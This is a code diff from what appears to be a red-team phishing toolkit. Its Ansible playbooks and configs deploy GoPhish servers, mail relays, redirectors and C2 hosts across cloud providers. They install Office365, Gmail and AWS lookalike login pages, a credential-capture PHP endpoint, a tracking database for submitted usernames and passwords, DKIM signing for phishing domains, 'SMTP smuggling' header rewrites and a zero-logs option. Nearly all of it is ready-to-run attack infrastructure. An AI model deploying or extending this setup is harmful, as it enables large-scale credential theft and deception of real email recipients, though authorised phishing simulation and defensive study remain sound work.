return False
|
||||
|
||||
except Exception as e:
|
||||
print(f"{COLORS['RED']}Deployment error: {str(e)}{COLORS['RESET']}")
|
||||
return False
|
||||
|
||||
if __name__ == "__main__":
|
||||
phishing_menu()
|
||||
@@ -0,0 +1,155 @@
|
||||
---
|
||||
# Main phishing infrastructure deployment playbook
|
||||
# Handles all deployment types and orchestrates component deployment
|
||||
|
||||
- name: Deploy phishing infrastructure
|
||||
hosts: 127.0.0.1
|
||||
gather_facts: true # Enable to get ansible_date_time
|
||||
connection: local
|
||||
vars:
|
||||
deployment_id: "{{ deployment_id | default('') }}"
|
||||
provider: "{{ provider | default('aws') }}"
|
||||
deployment_type: "{{ deployment_type | default('phishing_only_noccdn') }}"
|
||||
# Provider directory mapping
|
||||
provider_dirs:
|
||||
aws: "AWS"
|
||||
linode: "Linode"
|
||||
flokinet: "FlokiNET"
|
||||
|
||||
tasks:
|
||||
- name: Validate deployment configuration
|
||||
assert:
|
||||
that:
|
||||
- deployment_id != ""
|
||||
- provider != ""
|
||||
- deployment_type != ""
|
||||
fail_msg: "Missing required deployment parameters"
|
||||
|
||||
- name: Display deployment information
|
||||
debug:
|
||||
msg:
|
||||
- "Phishing Infrastructure Deployment"
|
||||
- "=================================="
|
||||
- "Deployment ID: {{ deployment_id }}"
|
||||
- "Provider: {{ provider }}"
|
||||
- "Deployment Type: {{ deployment_type }}"
|
||||
- "Phishing Domain: {{ phishing_domain | default('N/A') }}"
|
||||
|
||||
# Phase 1: Deploy core infrastructure components
|
||||
# Note: This playbook is orchestrated by deploy_phishing.py which calls individual provider playbooks
|
||||
# The actual infrastructure deployment is handled by provider-specific playbooks:
|
||||
# - providers/AWS/c2.yml for GoPhish/C2 servers
|
||||
# - providers/AWS/redirector.yml for redirectors
|
||||
# - providers/Linode/c2.yml, providers/Linode/redirector.yml for Linode
|
||||
# - modules/phishing/mta_front.yml for MTA front servers
|
||||
|
||||
- name: Deploy MTA Front server
|
||||
debug:
|
||||
msg: "🚀 Executing MTA Front deployment: mta_front.yml with server_name=mta-{{ deployment_id }}"
|
||||
when: deploy_mta_front | default(false) | bool
|
||||
|
||||
- name: Deploy Gophish server
|
||||
debug:
|
||||
msg: "🚀 Executing Gophish C2 deployment: ../../providers/{{ provider }}/c2.yml with c2_name=gophish-{{ deployment_id }}"
|
||||
when: deploy_gophish | default(false) | bool
|
||||
|
||||
- name: Deploy phishing redirector
|
||||
debug:
|
||||
msg: "🚀 Executing redirector deployment: ../../providers/{{ provider }}/redirector.yml with redirector_name=redirector-{{ deployment_id }}"
|
||||
when: deploy_phishing_redirector | default(false) | bool
|
||||
|
||||
- name: Deploy phishing web server
|
||||
debug:
|
||||
msg: "🚀 Executing web server deployment: phishing_webserver.yml with server_name=web-{{ deployment_id }}"
|
||||
when: deploy_phishing_webserver | default(false) | bool
|
||||
|
||||
# Optional payload infrastructure - commented out for basic phishing deployments
|
||||
# - name: Deploy payload redirector
|
||||
# debug:
|
||||
# msg:
|
||||
# - "🔧 Payload redirector deployment"
|
||||
# - "Server Name: payload-redir-{{ deployment_id }}"
|
||||
# - "✅ Executes: providers/{{ provider }}/redirector.yml"
|
||||
# when: deploy_payload_redirector | default(false) | bool
|
||||
|
||||
# - name: Deploy payload server
|
||||
# debug:
|
||||
# msg:
|
||||
# - "🔧 Payload server deployment"
|
||||
# - "Server Name: payload-{{ deployment_id }}"
|
||||
# - "✅ Executes: modules/payload-server/tasks/configure_payload_server.yml"
|
||||
# when: deploy_payload_server | default(false) | bool
|
||||
|
||||
# Phase 2: Deploy C2 infrastructure if requested (optional)
|
||||
# - name: Deploy C2 redirector
|
||||
# debug:
|
||||
# msg:
|
||||
# - "🔧 C2 redirector deployment"
|
||||
# - "Server Name: c2-redir-{{ deployment_id }}"
|
||||
# - "✅ Executes: providers/{{ provider }}/redirector.yml"
|
||||
# when: deploy_c2_redirector | default(false) | bool
|
||||
|
||||
# - name: Deploy C2 backend
|
||||
# debug:
|
||||
# msg:
|
||||
# - "🔧 C2 backend deployment"
|
||||
# - "Server Name: c2-backend-{{ deployment_id }}"
|
||||
# - "✅ Executes: providers/{{ provider }}/c2.yml"
|
||||
# when: deploy_c2_backend | default(false) | bool
|
||||
|
||||
# Phase 3: Configure security groups and firewall rules
|
||||
- name: Configure phishing security
|
||||
include_tasks: "tasks/setup_phishing_security.yml"
|
||||
vars:
|
||||
deployment_components:
|
||||
mta_front: "{{ deploy_mta_front | default(false) }}"
|
||||
gophish: "{{ deploy_gophish | default(false) }}"
|
||||
phishing_redirector: "{{ deploy_phishing_redirector | default(false) }}"
|
||||
phishing_webserver: "{{ deploy_phishing_webserver | default(false) }}"
|
||||
payload_redirector: "{{ deploy_payload_redirector | default(false) }}"
|
||||
payload_server: "{{ deploy_payload_server | default(false) }}"
|
||||
when: false # Disable for now since security task doesn't exist
|
||||
|
||||
# Phase 4: Save deployment state
|
||||
- name: Ensure logs directory exists
|
||||
file:
|
||||
path: "../../logs"
|
||||
state: directory
|
||||
mode: '0755'
|
||||
|
||||
- name: Save phishing deployment state
|
||||
template:
|
||||
src: "templates/phishing_deployment_state.j2"
|
||||
dest: "{{ playbook_dir }}/logs/phishing_deployment_{{ deployment_id }}.json"
|
||||
mode: '0600'
|
||||
vars:
|
||||
deployment_components:
|
||||
mta_front: "{{ deploy_mta_front | default(false) }}"
|
||||
gophish: "{{ deploy_gophish | default(false) }}"
|
||||
phishing_redirector: "{{ deploy_phishing_redirector | default(false) }}"
|
||||
phishing_webserver: "{{ deploy_phishing_webserver | default(false) }}"
|
||||
payload_redirector: "{{ deploy_payload_redirector | default(false) }}"
|
||||
payload_server: "{{ deploy_payload_server | default(false) }}"
|
||||
deployment_info:
|
||||
deployment_id: "{{ deployment_id }}"
|
||||
deployment_type: "{{ deployment_type }}"
|
||||
provider: "{{ provider }}"
|
||||
components: "{{ deployment_components }}"
|
||||
domains:
|
||||
phishing: "{{ phishing_domain | default('N/A') }}"
|
||||
created: "{{ ansible_date_time.iso8601 }}"
|
||||
ignore_errors: true # Continue if template fails
|
||||
|
||||
- name: Display deployment summary
|
||||
debug:
|
||||
msg:
|
||||
- "Phishing Infrastructure Deployment Complete!"
|
||||
- "==========================================="
|
||||
- "Deployment Type: {{ deployment_type }}"
|
||||
- "Phishing Domain: {{ phishing_domain }}"
|
||||
- "Components Deployed:"
|
||||
- " - GoPhish: {{ deploy_gophish | default(false) }}"
|
||||
- " - MTA Front: {{ deploy_mta_front | default(false) }}"
|
||||
- " - Web Server: {{ deploy_phishing_webserver | default(false) }}"
|
||||
- "Campaign ready to configure!"
|
||||
when: not disable_summary | default(false)
|
||||
@@ -0,0 +1,15 @@
|
||||
class OPSECGoPhish:
|
||||
def __init__(self):
|
||||
self.use_gophish_for = ['email_sending', 'template_management']
|
||||
self.use_custom_for = ['tracking', 'credential_capture', 'reporting']
|
||||
|
||||
def send_campaign(self, targets, template):
|
||||
# Use GoPhish SMTP capabilities
|
||||
campaign = self.create_minimal_campaign(targets, template)
|
||||
|
||||
# But replace tracking with custom implementation
|
||||
campaign.tracking_url = self.custom_tracker.generate_url()
|
||||
campaign.landing_page = self.custom_landing.generate()
|
||||
|
||||
# Store results in encrypted, distributed storage
|
||||
self.secure_storage.initialize(campaign.id)
|
||||
@@ -0,0 +1,198 @@
|
||||
---
|
||||
# Advanced Gophish configuration with enhanced evasion and features
|
||||
|
||||
- name: Create Gophish user
|
||||
user:
|
||||
name: gophish
|
||||
system: yes
|
||||
shell: /bin/bash
|
||||
home: /opt/gophish
|
||||
create_home: yes
|
||||
|
||||
- name: Download latest Gophish release
|
||||
get_url:
|
||||
url: "https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip"
|
||||
dest: /tmp/gophish.zip
|
||||
mode: '0644'
|
||||
|
||||
- name: Extract Gophish
|
||||
unarchive:
|
||||
src: /tmp/gophish.zip
|
||||
dest: /opt/gophish
|
||||
owner: gophish
|
||||
group: gophish
|
||||
remote_src: yes
|
||||
|
||||
- name: Install additional packages for advanced features
|
||||
apt:
|
||||
name:
|
||||
- nginx
|
||||
- certbot
|
||||
- python3-certbot-nginx
|
||||
- sqlite3
|
||||
- jq
|
||||
- curl
|
||||
- wget
|
||||
- php-fpm
|
||||
- php-sqlite3
|
||||
- nodejs
|
||||
- npm
|
||||
state: present
|
||||
|
||||
- name: Configure advanced Gophish settings
|
||||
template:
|
||||
src: "../templates/phishing/gophish-advanced-config.j2"
|
||||
dest: /opt/gophish/config.json
|
||||
owner: gophish
|
||||
group: gophish
|
||||
mode: '0600'
|
||||
|
||||
- name: Create enhanced email templates directory
|
||||
file:
|
||||
path: /opt/gophish/templates/{{ item }}
|
||||
state: directory
|
||||
owner: gophish
|
||||
group: gophish
|
||||
mode: '0755'
|
||||
loop:
|
||||
- email
|
||||
- landing
|
||||
- static
|
||||
|
||||
- name: Deploy email templates
|
||||
template:
|
||||
src: "../templates/phishing/email-templates/{{ item }}.j2"
|
||||
dest: "/opt/gophish/templates/email/{{ item }}.html"
|
||||
owner: gophish
|
||||
group: gophish
|
||||
mode: '0644'
|
||||
loop:
|
||||
- office365_login
|
||||
- password_expiry
|
||||
- security_alert
|
||||
- file_share
|
||||
when: not fedramp_mode | default(false) | bool
|
||||
|
||||
- name: Deploy FedRAMP compliant templates
|
||||
template:
|
||||
src: "../templates/phishing/fedramp-compliance.j2"
|
||||
dest: "/opt/gophish/templates/email/fedramp_template.html"
|
||||
owner: gophish
|
||||
group: gophish
|
||||
mode: '0644'
|
||||
when: fedramp_mode | default(false) | bool
|
||||
|
||||
- name: Create advanced landing pages
|
||||
template:
|
||||
src: "../templates/phishing/phishing-landing-page.j2"
|
||||
dest: "/opt/gophish/templates/landing/{{ item }}_landing.html"
|
||||
owner: gophish
|
||||
group: gophish
|
||||
mode: '0644'
|
||||
loop:
|
||||
- office365
|
||||
- generic
|
||||
- fedramp
|
||||
vars:
|
||||
template_type: "{{ item }}"
|
||||
|
||||
- name: Install enhanced tracking pixel
|
||||
copy:
|
||||
src: "../../tracker/files/simple_email_tracker.py"
|
||||
dest: /opt/gophish/tracker.py
|
||||
owner: gophish
|
||||
group: gophish
|
||||
mode: '0755'
|
||||
|
||||
- name: Create Gophish database backup script
|
||||
template:
|
||||
src: "../templates/phishing/gophish-backup.sh.j2"
|
||||
dest: /opt/gophish/backup.sh
|
||||
owner: gophish
|
||||
group: gophish
|
||||
mode: '0755'
|
||||
|
||||
- name: Set up database backup cron
|
||||
cron:
|
||||
name: "Backup Gophish database"
|
||||
minute: "0"
|
||||
hour: "*/6"
|
||||
job: "/opt/gophish/backup.sh"
|
||||
user: gophish
|
||||
|
||||
- name: Create Gophish systemd service
|
||||
template:
|
||||
src: "../templates/phishing/gophish.service.j2"
|
||||
dest: /etc/systemd/system/gophish.service
|
||||
mode: '0644'
|
||||
|
||||
- name: Enable and start Gophish service
|
||||
systemd:
|
||||
name: gophish
|
||||
state: started
|
||||
enabled: yes
|
||||
daemon_reload: yes
|
||||
|
||||
- name: Create campaign automation script
|
||||
template:
|
||||
src: "../templates/phishing/campaign-automation.py.j2"
|
||||
dest: /opt/gophish/campaign-automation.py
|
||||
owner: gophish
|
||||
group: gophish
|
||||
mode: '0755'
|
||||
|
||||
- name: Install Python dependencies for automation
|
||||
pip:
|
||||
name:
|
||||
- requests
|
||||
- python-dateutil
|
||||
- jinja2
|
||||
state: present
|
||||
|
||||
- name: Configure SMTP relay to MTA front
|
||||
blockinfile:
|
||||
path: /opt/gophish/config.json
|
||||
marker: "// {mark} ANSIBLE MANAGED SMTP CONFIG"
|
||||
block: |
|
||||
"smtp": {
|
||||
"host": "{{ mta_front_ip }}:587",
|
||||
"username": "{{ smtp_relay_user }}",
|
||||
"password": "{{ smtp_relay_pass }}",
|
||||
"from": "{{ sender_email }}",
|
||||
"ignore_cert_errors": true
|
||||
}
|
||||
|
||||
- name: Create phishing metrics dashboard
|
||||
template:
|
||||
src: "../templates/phishing/metrics-dashboard.html.j2"
|
||||
dest: /opt/gophish/static/metrics.html
|
||||
owner: gophish
|
||||
group: gophish
|
||||
mode: '0644'
|
||||
|
||||
- name: Set up log aggregation
|
||||
lineinfile:
|
||||
path: /etc/rsyslog.conf
|
||||
line: "local0.* /var/log/gophish.log"
|
||||
state: present
|
||||
notify: restart rsyslog
|
||||
|
||||
- name: Configure log rotation for Gophish
|
||||
copy:
|
||||
dest: /etc/logrotate.d/gophish
|
||||
content: |
|
||||
/var/log/gophish.log {
|
||||
daily
|
||||
missingok
|
||||
rotate 30
|
||||
compress
|
||||
delaycompress
|
||||
notifempty
|
||||
create 0644 gophish gophish
|
||||
}
|
||||
|
||||
handlers:
|
||||
- name: restart rsyslog
|
||||
service:
|
||||
name: rsyslog
|
||||
state: restarted
|
||||
@@ -0,0 +1,296 @@
|
||||
---
|
||||
# Common tasks for configuring advanced phishing server
|
||||
# Supports both red team and FedRAMP compliance modes
|
||||
|
||||
- name: Update system packages
|
||||
apt:
|
||||
update_cache: yes
|
||||
upgrade: dist
|
||||
|
||||
- name: Install base packages for phishing server
|
||||
apt:
|
||||
name:
|
||||
- nginx
|
||||
- certbot
|
||||
- python3-certbot-nginx
|
||||
- postfix
|
||||
- dovecot-core
|
||||
- dovecot-imapd
|
||||
- opendkim
|
||||
- opendkim-tools
|
||||
- sqlite3
|
||||
- git
|
||||
- curl
|
||||
- wget
|
||||
- jq
|
||||
- unzip
|
||||
- python3-pip
|
||||
- python3-venv
|
||||
- nodejs
|
||||
- npm
|
||||
- php-fpm
|
||||
- php-sqlite3
|
||||
- php-curl
|
||||
- php-json
|
||||
- swaks
|
||||
- dnsutils
|
||||
- net-tools
|
||||
- fail2ban
|
||||
state: present
|
||||
|
||||
- name: Create phishing tools directory
|
||||
file:
|
||||
path: "{{ item }}"
|
||||
state: directory
|
||||
mode: '0755'
|
||||
owner: root
|
||||
group: root
|
||||
with_items:
|
||||
- /root/Tools/phishing
|
||||
- /root/Tools/phishing/templates
|
||||
- /root/Tools/phishing/campaigns
|
||||
- /root/Tools/phishing/logs
|
||||
- /var/www/phishing
|
||||
- /var/www/phishing/assets
|
||||
- /var/www/phishing/api
|
||||
|
||||
- name: Set up GoPhish directory
|
||||
file:
|
||||
path: /root/Tools/gophish
|
||||
state: directory
|
||||
mode: '0755'
|
||||
|
||||
- name: Download latest GoPhish release
|
||||
shell: |
|
||||
LATEST_URL=$(curl -s https://api.github.com/repos/gophish/gophish/releases/latest | jq -r '.assets[] | select(.browser_download_url | contains("linux-64bit.zip")) | .browser_download_url')
|
||||
curl -L "$LATEST_URL" -o /tmp/gophish.zip
|
||||
unzip /tmp/gophish.zip -d /root/Tools/gophish
|
||||
chmod +x /root/Tools/gophish/gophish
|
||||
rm -f /tmp/gophish.zip
|
||||
args:
|
||||
creates: /root/Tools/gophish/gophish
|
||||
|
||||
- name: Create advanced GoPhish configuration
|
||||
template:
|
||||
src: "../templates/advanced-gophish-config.j2"
|
||||
dest: "/root/Tools/gophish/config.json"
|
||||
mode: '0600'
|
||||
owner: root
|
||||
group: root
|
||||
|
||||
- name: Create GoPhish systemd service
|
||||
template:
|
||||
src: "../templates/gophish.service.j2"
|
||||
dest: "/etc/systemd/system/gophish.service"
|
||||
mode: '0644'
|
||||
owner: root
|
||||
group: root
|
||||
|
||||
- name: Configure Postfix for outbound email
|
||||
template:
|
||||
src: "../templates/postfix-phishing.conf.j2"
|
||||
dest: "/etc/postfix/main.cf"
|
||||
backup: yes
|
||||
notify: restart postfix
|
||||
|
||||
- name: Configure OpenDKIM for email authentication
|
||||
template:
|
||||
src: "../templates/opendkim-phishing.conf.j2"
|
||||
dest: "/etc/opendkim.conf"
|
||||
backup: yes
|
||||
notify: restart opendkim
|
||||
|
||||
- name: Create DKIM keys directory
|
||||
file:
|
||||
path: "/etc/opendkim/keys/{{ phishing_domain }}"
|
||||
state: directory
|
||||
owner: opendkim
|
||||
group: opendkim
|
||||
mode: '0700'
|
||||
|
||||
- name: Generate DKIM keys
|
||||
command: >
|
||||
opendkim-genkey -D /etc/opendkim/keys/{{ phishing_domain }}
|
||||
-d {{ phishing_domain }} -s phishing
|
||||
args:
|
||||
creates: "/etc/opendkim/keys/{{ phishing_domain }}/phishing.private"
|
||||
|
||||
- name: Set DKIM key permissions
|
||||
file:
|
||||
path: "/etc/opendkim/keys/{{ phishing_domain }}/phishing.private"
|
||||
owner: opendkim
|
||||
group: opendkim
|
||||
mode: '0600'
|
||||
|
||||
- name: Create phishing landing page templates
|
||||
template:
|
||||
src: "{{ item.src }}"
|
||||
dest: "{{ item.dest }}"
|
||||
mode: '0644'
|
||||
owner: www-data
|
||||
group: www-data
|
||||
with_items:
|
||||
- { src: "../templates/phishing-landing-office365.html.j2", dest: "/var/www/phishing/office365.html" }
|
||||
- { src: "../templates/phishing-landing-gmail.html.j2", dest: "/var/www/phishing/gmail.html" }
|
||||
- { src: "../templates/phishing-landing-aws.html.j2", dest: "/var/www/phishing/aws.html" }
|
||||
- { src: "../templates/phishing-landing-generic.html.j2", dest: "/var/www/phishing/generic.html" }
|
||||
|
||||
- name: Create credential capture API
|
||||
template:
|
||||
src: "../templates/credential-capture-api.php.j2"
|
||||
dest: "/var/www/phishing/api/capture.php"
|
||||
mode: '0644'
|
||||
owner: www-data
|
||||
group: www-data
|
||||
|
||||
- name: Create tracking pixel endpoint
|
||||
template:
|
||||
src: "../templates/tracking-pixel.php.j2"
|
||||
dest: "/var/www/phishing/track.php"
|
||||
mode: '0644'
|
||||
owner: www-data
|
||||
group: www-data
|
||||
|
||||
- name: Configure Nginx for phishing sites
|
||||
template:
|
||||
src: "../templates/nginx-phishing.conf.j2"
|
||||
dest: "/etc/nginx/sites-available/phishing"
|
||||
mode: '0644'
|
||||
notify: reload nginx
|
||||
|
||||
- name: Enable phishing site
|
||||
file:
|
||||
src: /etc/nginx/sites-available/phishing
|
||||
dest: /etc/nginx/sites-enabled/phishing
|
||||
state: link
|
||||
notify: reload nginx
|
||||
|
||||
- name: Create phishing campaign management scripts
|
||||
template:
|
||||
src: "{{ item.src }}"
|
||||
dest: "{{ item.dest }}"
|
||||
mode: '0755'
|
||||
owner: root
|
||||
group: root
|
||||
with_items:
|
||||
- { src: "../templates/campaign-launcher.sh.j2", dest: "/root/Tools/phishing/launch-campaign.sh" }
|
||||
- { src: "../templates/stats-collector.sh.j2", dest: "/root/Tools/phishing/collect-stats.sh" }
|
||||
- { src: "../templates/email-validator.py.j2", dest: "/root/Tools/phishing/validate-emails.py" }
|
||||
|
||||
- name: Create database for tracking
|
||||
shell: |
|
||||
sqlite3 /root/Tools/phishing/tracking.db << EOF
|
||||
CREATE TABLE IF NOT EXISTS email_opens (
|
||||
id INTEGER PRIMARY KEY AUTOINCREMENT,
|
||||
campaign_id TEXT NOT NULL,
|
||||
recipient_email TEXT NOT NULL,
|
||||
ip_address TEXT,
|
||||
user_agent TEXT,
|
||||
opened_at DATETIME DEFAULT CURRENT_TIMESTAMP,
|
||||
location TEXT
|
||||
);
|
||||
|
||||
CREATE TABLE IF NOT EXISTS link_clicks (
|
||||
id INTEGER PRIMARY KEY AUTOINCREMENT,
|
||||
campaign_id TEXT NOT NULL,
|
||||
recipient_email TEXT NOT NULL,
|
||||
link_url TEXT NOT NULL,
|
||||
ip_address TEXT,
|
||||
user_agent TEXT,
|
||||
clicked_at DATETIME DEFAULT CURRENT_TIMESTAMP,
|
||||
location TEXT
|
||||
);
|
||||
|
||||
CREATE TABLE IF NOT EXISTS credential_submissions (
|
||||
id INTEGER PRIMARY KEY AUTOINCREMENT,
|
||||
campaign_id TEXT NOT NULL,
|
||||
recipient_email TEXT,
|
||||
username TEXT,
|
||||
password_hash TEXT,
|
||||
ip_address TEXT,
|
||||
user_agent TEXT,
|
||||
submitted_at DATETIME DEFAULT CURRENT_TIMESTAMP,
|
||||
location TEXT,
|
||||
additional_data TEXT
|
||||
);
|
||||
|
||||
CREATE TABLE IF NOT EXISTS campaigns (
|
||||
id TEXT PRIMARY KEY,
|
||||
name TEXT NOT NULL,
|
||||
template TEXT NOT NULL,
|
||||
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
|
||||
status TEXT DEFAULT 'active',
|
||||
target_count INTEGER DEFAULT 0,
|
||||
opened_count INTEGER DEFAULT 0,
|
||||
clicked_count INTEGER DEFAULT 0,
|
||||
submitted_count INTEGER DEFAULT 0
|
||||
);
|
||||
EOF
|
||||
args:
|
||||
creates: /root/Tools/phishing/tracking.db
|
||||
|
||||
- name: Set database permissions
|
||||
file:
|
||||
path: /root/Tools/phishing/tracking.db
|
||||
owner: www-data
|
||||
group: www-data
|
||||
mode: '0644'
|
||||
|
||||
- name: Install Python dependencies for advanced features
|
||||
pip:
|
||||
name:
|
||||
- requests
|
||||
- beautifulsoup4
|
||||
- lxml
|
||||
- flask
|
||||
- flask-cors
|
||||
- dnspython
|
||||
- python-whois
|
||||
- selenium
|
||||
- fake-useragent
|
||||
state: present
|
||||
|
||||
- name: Create SSL certificate setup script
|
||||
template:
|
||||
src: "../templates/setup-phishing-ssl.sh.j2"
|
||||
dest: "/root/Tools/phishing/setup-ssl.sh"
|
||||
mode: '0755'
|
||||
owner: root
|
||||
group: root
|
||||
|
||||
- name: Create domain reputation checker
|
||||
template:
|
||||
src: "../templates/domain-reputation.py.j2"
|
||||
dest: "/root/Tools/phishing/check-reputation.py"
|
||||
mode: '0755'
|
||||
owner: root
|
||||
group: root
|
||||
|
||||
- name: Start and enable services
|
||||
systemd:
|
||||
name: "{{ item }}"
|
||||
state: started
|
||||
enabled: yes
|
||||
daemon_reload: yes
|
||||
with_items:
|
||||
- postfix
|
||||
- opendkim
|
||||
- nginx
|
||||
- php7.4-fpm
|
||||
- gophish
|
||||
|
||||
handlers:
|
||||
- name: restart postfix
|
||||
systemd:
|
||||
name: postfix
|
||||
state: restarted
|
||||
|
||||
- name: restart opendkim
|
||||
systemd:
|
||||
name: opendkim
|
||||
state: restarted
|
||||
|
||||
- name: reload nginx
|
||||
systemd:
|
||||
name: nginx
|
||||
state: reloaded
|
||||
@@ -0,0 +1,42 @@
|
||||
{
|
||||
"admin_server": {
|
||||
"listen_url": "127.0.0.1:{{ gophish_admin_port }}",
|
||||
"use_tls": true,
|
||||
"cert_path": "/etc/letsencrypt/live/{{ phishing_domain }}/fullchain.pem",
|
||||
"key_path": "/etc/letsencrypt/live/{{ phishing_domain }}/privkey.pem",
|
||||
"trusted_origins": []
|
||||
},
|
||||
"phish_server": {
|
||||
"listen_url": "0.0.0.0:{{ gophish_phish_port | default(8081) }}",
|
||||
"use_tls": false,
|
||||
"cert_path": "",
|
||||
"key_path": ""
|
||||
},
|
||||
"db_name": "sqlite3",
|
||||
"db_path": "gophish.db",
|
||||
"migrations_prefix": "db/db_",
|
||||
"contact_address": "{{ smtp_from_address | default('noreply@' + domain) }}",
|
||||
"logging": {
|
||||
"filename": "{{ '/dev/null' if zero_logs | default(true) else 'gophish.log' }}",
|
||||
"level": "{{ 'error' if zero_logs | default(true) else 'info' }}"
|
||||
},
|
||||
"webhook": {
|
||||
"enabled": {{ enable_webhooks | default(false) | lower }},
|
||||
"url": "{{ webhook_url | default('') }}",
|
||||
"secret": "{{ webhook_secret | default('') }}"
|
||||
},
|
||||
"email": {
|
||||
"smtp": {
|
||||
"host": "{{ mta_front_ip | default('127.0.0.1') }}",
|
||||
"port": 25,
|
||||
"use_auth": true,
|
||||
"username": "{{ smtp_auth_user }}",
|
||||
"password": "{{ smtp_auth_pass }}",
|
||||
"from_address": "{{ smtp_from_address | default('noreply@' + domain) }}",
|
||||
"ignore_cert_errors": true
|
||||
},
|
||||
"imap": {
|
||||
"enabled": false
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,23 @@
|
||||
{
|
||||
"admin_server": {
|
||||
"listen_url": "0.0.0.0:{{ gophish_admin_port }}",
|
||||
"use_tls": true,
|
||||
"cert_path": "/etc/letsencrypt/live/{{ domain }}/fullchain.pem",
|
||||
"key_path": "/etc/letsencrypt/live/{{ domain }}/privkey.pem",
|
||||
"trusted_origins": []
|
||||
},
|
||||
"phish_server": {
|
||||
"listen_url": "0.0.0.0:8081",
|
||||
"use_tls": false,
|
||||
"cert_path": "/etc/letsencrypt/live/{{ domain }}/fullchain.pem",
|
||||
"key_path": "/etc/letsencrypt/live/{{ domain }}/privkey.pem"
|
||||
},
|
||||
"db_name": "sqlite3",
|
||||
"db_path": "gophish.db",
|
||||
"migrations_prefix": "db/db_",
|
||||
"contact_address": "",
|
||||
"logging": {
|
||||
"filename": "",
|
||||
"level": ""
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,22 @@
|
||||
# modules/phishing/gophish/templates/gophish-opsec.yaotl.j2
|
||||
gophish:
|
||||
admin_server:
|
||||
# Only listen on localhost
|
||||
listen_url: "127.0.0.1:{{ gophish_admin_port }}"
|
||||
# Use client certificates
|
||||
use_tls: true
|
||||
tls_cert: "/opt/gophish/admin-cert.pem"
|
||||
tls_key: "/opt/gophish/admin-key.pem"
|
||||
client_ca: "/opt/gophish/client-ca.pem"
|
||||
|
||||
phish_server:
|
||||
# Behind nginx, no direct exposure
|
||||
listen_url: "127.0.0.1:{{ gophish_phish_port }}"
|
||||
|
||||
# Custom modifications
|
||||
modifications:
|
||||
- remove_default_headers: true
|
||||
- randomize_endpoints: true
|
||||
- custom_tracking_pixel: true
|
||||
- encrypted_storage: true
|
||||
- auto_purge_days: 7
|
||||
@@ -0,0 +1,51 @@
|
||||
---
|
||||
# Advanced Gophish server deployment with enhanced features
|
||||
|
||||
- name: Deploy Gophish server
|
||||
hosts: localhost
|
||||
gather_facts: false
|
||||
connection: local
|
||||
vars_files:
|
||||
- vars.yaml
|
||||
vars:
|
||||
gophish_instance_type: "{{ gophish_instance_type | default('t3.large') }}"
|
||||
gophish_region: "{{ gophish_region | default(aws_region) }}"
|
||||
|
||||
tasks:
|
||||
- name: Create Gophish instance
|
||||
include_tasks: "../../providers/AWS/tasks/create_instance.yml"
|
||||
vars:
|
||||
instance_name: "{{ server_name }}"
|
||||
instance_type: "{{ gophish_instance_type }}"
|
||||
region: "{{ gophish_region }}"
|
||||
security_group_rules:
|
||||
- { proto: tcp, port: 22, cidr: "{{ operator_ip }}/32", desc: "SSH from operator" }
|
||||
- { proto: tcp, port: 3333, cidr: "{{ operator_ip }}/32", desc: "Gophish admin" }
|
||||
- { proto: tcp, port: 25, cidr: "{{ mta_front_ip | default('10.0.0.0/8') }}/32", desc: "SMTP from MTA" }
|
||||
- { proto: tcp, port: 80, cidr: "{{ phishing_redirector_ip | default('10.0.0.0/8') }}/32", desc: "HTTP from redirector" }
|
||||
|
||||
- name: Add Gophish to inventory
|
||||
add_host:
|
||||
name: "gophish_server"
|
||||
groups: "gophish_servers"
|
||||
ansible_host: "{{ instance_ip }}"
|
||||
ansible_user: "{{ ansible_user | default('ubuntu') }}"
|
||||
ansible_ssh_private_key_file: "{{ ssh_key_path }}"
|
||||
ansible_ssh_common_args: "-o StrictHostKeyChecking=no"
|
||||
|
||||
- name: Configure Gophish server
|
||||
hosts: gophish_servers
|
||||
become: true
|
||||
gather_facts: true
|
||||
vars_files:
|
||||
- vars.yaml
|
||||
tasks:
|
||||
- name: Include advanced Gophish configuration
|
||||
include_tasks: "gophish/tasks/configure_gophish_advanced.yml"
|
||||
|
||||
- name: Include security hardening
|
||||
include_tasks: "../../common/tasks/security_hardening.yml"
|
||||
|
||||
- name: Include tracker setup
|
||||
include_tasks: "../../c2/tasks/configure_integrated_tracker.yml"
|
||||
when: deploy_tracker | default(true) | bool
|
||||
@@ -0,0 +1,151 @@
|
||||
---
|
||||
# Configure MTA Front server for email relay and SMTP smuggling
|
||||
|
||||
- name: Update system packages
|
||||
apt:
|
||||
update_cache: yes
|
||||
upgrade: dist
|
||||
|
||||
- name: Install MTA packages
|
||||
apt:
|
||||
name:
|
||||
- postfix
|
||||
- postfix-pcre
|
||||
- dovecot-core
|
||||
- dovecot-imapd
|
||||
- opendkim
|
||||
- opendkim-tools
|
||||
- python3-pip
|
||||
- python3-venv
|
||||
- nginx
|
||||
- certbot
|
||||
- python3-certbot-nginx
|
||||
- dnsutils
|
||||
- swaks
|
||||
- telnet
|
||||
state: present
|
||||
|
||||
- name: Configure Postfix for MTA fronting
|
||||
template:
|
||||
src: "../templates/phishing/postfix-mta-front.j2"
|
||||
dest: /etc/postfix/main.cf
|
||||
backup: yes
|
||||
notify: restart postfix
|
||||
|
||||
- name: Configure Postfix master.cf for advanced relaying
|
||||
blockinfile:
|
||||
path: /etc/postfix/master.cf
|
||||
block: |
|
||||
# SMTP smuggling and advanced relay configurations
|
||||
587 inet n - y - - smtpd
|
||||
-o syslog_name=postfix/submission
|
||||
-o smtpd_tls_security_level=encrypt
|
||||
-o smtpd_sasl_auth_enable=yes
|
||||
-o smtpd_tls_wrappermode=no
|
||||
-o smtpd_client_restrictions=permit_sasl_authenticated,reject
|
||||
-o smtpd_relay_restrictions=permit_sasl_authenticated,reject
|
||||
-o milter_macro_daemon_name=ORIGINATING
|
||||
|
||||
# SMTP smuggling support
|
||||
cleanup unix n - y - 0 cleanup
|
||||
-o header_checks=pcre:/etc/postfix/header_checks
|
||||
-o nested_header_checks=pcre:/etc/postfix/nested_header_checks
|
||||
|
||||
- name: Create SMTP smuggling header checks
|
||||
copy:
|
||||
dest: /etc/postfix/header_checks
|
||||
content: |
|
||||
# SMTP smuggling techniques
|
||||
/^Content-Transfer-Encoding:\s*7bit/i REPLACE Content-Transfer-Encoding: 8bit
|
||||
/^Content-Type:\s*text\/plain/i REPLACE Content-Type: text/html
|
||||
mode: '0644'
|
||||
notify:
|
||||
- reload postfix
|
||||
- postmap header_checks
|
